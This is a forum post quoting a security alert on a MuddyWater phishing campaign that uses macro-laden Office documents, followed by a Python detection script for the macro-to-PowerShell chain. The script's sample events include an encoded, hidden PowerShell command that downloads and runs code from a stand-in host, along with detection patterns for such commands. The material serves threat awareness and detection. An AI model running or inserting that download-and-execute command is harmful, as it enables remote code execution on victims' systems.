Security Alert: New Spear Phishing Campaign Operated by the MuddyWater Group
Quote:

In which a malicious PowerShell payload is used to spread malware

You have probably heard about the hacking group known as “MuddyWater”, which was behind previous spam campaigns targeting a wide range of industries and institutions in several countries across the Middle East, Europe, and the US.

The group was first spotted in 2017, when it hit the Saudi Government; later spam campaigns discovered by security researchers were also linked to the same group.

It appears that the authors of the MuddyWater group aren’t slowing down these attacks and continue to be highly active and persistent. Earlier this week, threat researchers observed another spam campaign in which the “MuddyWater” group has been involved.

How the infection spreads (some technical details included)

In the analyzed campaign, malicious actors are using social engineering techniques to bait potential victims from targeted organizations into enabling macros in the Microsoft Office package.

It’s not the first time this attack vector has been used, but as long as it still works, why not try it, right?

In this scenario, users receive a phishing email with a document containing VBA macro code which, if enabled, will compromise users’ systems by using a PowerShell payload.

The image below shows how the malicious document from the spam campaign looks to the recipient.

If macros are enabled, cybercriminals use the Windows Script Host “//E” command line, which is a Base64-encoded payload employing an obfuscation method.
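The chain the quoted article describes (an Office macro launching Windows Script Host with `//E`, which in turn hands off a Base64-encoded PowerShell payload) is visible in process-creation telemetry. Below is an added detection example written for this thread; it is not code from the Heimdal article or the forum post. The event fields follow the Sysmon Event ID 1 layout, the process paths and the encoded stage-two command are constructed samples, and the rule names are hypothetical.

```python
import base64
import re

# Process names the rules key on: Office parents and the script hosts the macro chain lands in.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe"}
ENCODED_FLAG = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
WSH_ENGINE_FLAG = re.compile(r"(?i)//E:\w+")  # //E:<engine> forces a WSH engine regardless of file extension

def decode_encoded_command(cmdline):
    """Return the PowerShell -EncodedCommand payload (base64 over UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(event):
    """List the reasons one process-creation event matches the macro -> WSH -> PowerShell chain."""
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmdline = event["command_line"]
    reasons = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        reasons.append(f"office_spawned_script_host:{parent}->{image}")
    if image in {"wscript.exe", "cscript.exe"} and WSH_ENGINE_FLAG.search(cmdline):
        reasons.append("wsh_engine_override")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("powershell_encoded_command")
        # Surface the decoded text so the analyst sees the real command, not the base64 blob.
        if re.search(r"(?i)downloadstring|invoke-expression|\biex\b|frombase64string", decoded):
            reasons.append("decoded_payload_downloads_or_evals")
    return reasons

def scan(events):
    """Map event id -> reasons for every event that matched at least one rule."""
    hits = ((e["id"], score_event(e)) for e in events)
    return {event_id: reasons for event_id, reasons in hits if reasons}

# Constructed sample events in Sysmon Event ID 1 style; not telemetry from the article.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s2')"
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "command_line": '"WINWORD.EXE" /n report.docm'},
    {"id": 2, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "image": r"C:\Windows\System32\wscript.exe", "command_line": r"wscript.exe //E:vbscript //B C:\Users\u\AppData\Local\Temp\x.txt"},
    {"id": 3, "parent_image": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "command_line": f"powershell.exe -NoP -W Hidden -enc {ENCODED}"},
]
```

Calling `scan(SAMPLE_EVENTS)` flags events 2 and 3 only: the benign Word launch produces no reasons, while the `//E:` override and the decoded `-enc` stage each produce their own.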